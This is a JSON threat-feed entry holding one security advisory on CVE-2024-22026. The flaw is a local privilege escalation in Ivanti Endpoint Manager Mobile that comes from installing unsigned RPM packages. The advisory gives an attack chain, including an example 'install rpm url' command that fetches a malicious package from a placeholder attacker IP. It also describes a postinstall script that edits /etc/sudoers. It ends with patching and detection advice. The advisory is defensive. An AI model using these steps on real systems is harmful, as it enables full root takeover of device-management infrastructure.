{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","favicon":"https://feed.craftedsignal.io/favicon-32x32.png","feed_url":"https://feed.craftedsignal.io/products/endpoint-manager-mobile--12.1.0.0--12.0.0.0--11.12.0.1/feed.json","home_page_url":"https://feed.craftedsignal.io/","icon":"https://feed.craftedsignal.io/apple-touch-icon.png","items":[{"_cs_actors":[],"_cs_cpes":["cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:*"],"_cs_cves":[{"cvss":6.7,"id":"CVE-2024-22026"}],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["Endpoint Manager Mobile (\u003c 12.1.0.0, \u003c 12.0.0.0, \u003c 11.12.0.1)"],"_cs_severities":["low"],"_cs_tags":["privilege-escalation","vulnerability"],"_cs_type":"advisory","_cs_vendors":["Ivanti"],"content_html":"\u003cp\u003eCVE-2024-22026 is a local privilege escalation vulnerability affecting Ivanti Endpoint Manager Mobile (formerly MobileIron Core). The flaw resides in the CLI utility 'install rpm url', which fails to validate the authenticity or origin of RPM packages before installation. An attacker with existing low-privileged access to the system can point this utility to a remote, attacker-controlled repository containing a malicious RPM package. Upon execution, the utility invokes the native 'rpm' binary with root privileges to install the package. Because there is no signature verification or URL filtering, the system executes arbitrary scripts contained within the package's pre-install and post-install hooks, leading to full system compromise. The vulnerability is addressed in Ivanti EPMM versions 12.1.0.0, 12.0.0.0, and 11.12.0.1.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access to the Ivanti EPMM system as a low-privileged user via compromised credentials or other entry vectors.\u003c/li\u003e\n\u003cli\u003eAttacker prepares a malicious RPM package using tools such as 'fpm', embedding custom scripts in 'preinstall.sh' and 'postinstall.sh'.\u003c/li\u003e\n\u003cli\u003eAttacker hosts the malicious RPM package on an external web server accessible by the target appliance.\u003c/li\u003e\n\u003cli\u003eAttacker executes the CLI command 'install rpm url http://\u0026lt;attacker_IP\u0026gt;/\u0026lt;malicious\u0026gt;.rpm' within the Ivanti console.\u003c/li\u003e\n\u003cli\u003eThe application triggers the internal process to download the package from the provided URL.\u003c/li\u003e\n\u003cli\u003eThe system executes '/bin/rpm -Uvh *.rpm' with root privileges to perform the installation.\u003c/li\u003e\n\u003cli\u003eThe embedded 'postinstall.sh' script executes under the root context, creating a new user and modifying '/etc/sudoers' to grant persistent root access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation results in full root-level compromise of the Ivanti EPMM appliance. Attackers can gain complete control over the device management infrastructure, potentially allowing them to bypass mobile security policies, exfiltrate sensitive configuration data, or push malicious profiles/applications to managed endpoints across the organization.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eUpgrade all Ivanti Endpoint Manager Mobile instances to version 12.1.0.0, 12.0.0.0, or 11.12.0.1 immediately to patch CVE-2024-22026.\u003c/li\u003e\n\u003cli\u003eImplement strict network egress filtering on management appliances to prevent unauthorized outbound connections to untrusted external repositories or web servers.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules below to detect unauthorized usage of the 'install rpm' CLI command or execution of rpm installation processes by non-administrative users.\u003c/li\u003e\n\u003cli\u003eReview system audit logs for unauthorized user creation or modifications to the /etc/sudoers file.\u003c/li\u003e\n\u003c/ol\u003e\n","date_modified":"2026-10-02T16:37:08Z","date_published":"2026-10-02T16:37:08Z","id":"https://feed.craftedsignal.io/briefs/2026-10-ivanti-epmm-lpe/","summary":"A local privilege escalation vulnerability in Ivanti EPMM, tracked as CVE-2024-22026, allows an authenticated local attacker to achieve root access by installing unsigned RPM packages via the CLI 'install rpm url' command.","title":"Local Privilege Escalation in Ivanti Endpoint Manager Mobile (CVE-2024-22026)","url":"https://feed.craftedsignal.io/briefs/2026-10-ivanti-epmm-lpe/"}],"language":"en","title":"CraftedSignal Threat Feed - Endpoint Manager Mobile (\u003c 12.1.0.0, \u003c 12.0.0.0, \u003c 11.12.0.1)","version":"https://jsonfeed.org/version/1.1"}